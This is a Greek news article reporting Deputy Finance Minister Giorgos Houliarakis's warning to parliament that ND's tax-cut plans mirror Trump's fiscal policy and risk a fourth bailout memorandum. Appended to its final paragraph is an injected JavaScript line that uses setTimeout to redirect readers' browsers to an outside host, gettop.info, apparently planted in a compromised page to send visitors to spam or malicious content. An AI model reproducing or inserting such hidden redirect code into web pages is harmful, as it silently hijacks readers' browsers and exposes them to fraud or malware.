Χουλιαράκης: Η ΝΔ θα οδηγήσει σε τέταρτο μνημόνιο

0
3

 

 Τους κινδύνους από την οικονομική πολιτική Τραμπ, που όπως είπε ακολουθεί και η ηγεσία της ΝΔ, η οποία θα οδηγήσει σε τέταρτο μνημόνιο, επισήμανε ο αναπληρωτής υπουργός Οικονομικών Γιώργος Χουλιαράκης μιλώντας στην Επιτροπή Απολογισμού της Βουλής.

«Είμαι ανήσυχος από το αποτέλεσμα για δύο λόγους. Ο πρώτος είναι ότι οι θέσεις του εκλεγμένου προέδρου είναι το λιγότερο ασαφείς και η αυξημένη αβεβαιότητα που προκύπτει κάνει κακό», τόνισε ο Γ. Χουλιαράκης και αναφερόμενος στον δεύτερο λόγο ζήτησε «να δούμε τη δημοσιονομική πολιτική.

Η δέσμευση του Τραμπ είναι την επόμενη 10ετία να δαπανήσει 1 τρισ. σε επενδύσεις υποδομής και ταυτόχρονα να προχωρήσει σε σημαντική μείωση της φορολογίας επιχειρήσεων από 35% σε 15% και της φορολογίας εισοδήματος από 38,9% σε 33% και της κατάργησης του φόρου μεγάλης ακίνητης περιουσίας, με προφανές αποτέλεσμα στην επιδείνωση του δημοσιονομικού ελλείμματος και του εμπορικού ισοζυγίου των ΗΠΑ.

Αυτό σημαίνει ανατίμηση του ευρώ, που είναι κίνδυνος για μας. Στην προσπάθειά της να αντιδράσει η Κεντρική Τράπεζα των ΗΠΑ θα αυξήσει τα επιτόκια και αυτό σημαίνει απότομη μείωση ρευστότητας που είναι κίνδυνος για την παγκόσμια και την ελληνική οικονομία».

Ο αναπληρωτής υπουργός επεσήμανε ότι «την ίδια πολιτική προτείνει και η ΝΔ. Στη ΔΕΘ ο Μητσοτάκης υποσχέθηκε μείωση έξι φορολογικών συντελεστών με συνολικό κόστος που ξεπερνά τα 4 δισ. ευρώ. Στην ελληνική περίπτωση η επιθετική και αλόγιστη μείωση, το μείγμα της πολιτικής Τραμπ, δεν θα οδηγήσει μόνο σε εκτροχιασμό των δημοσίων οικονομικών, αλλά σε απώλεια αξιοπιστίας και θα αυξήσει τον κίνδυνο τέταρτου προγράμματος ή, προκειμένου να τα αποφύγει όλα αυτά, σε λεηλασία του κοινωνικού κράτους». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here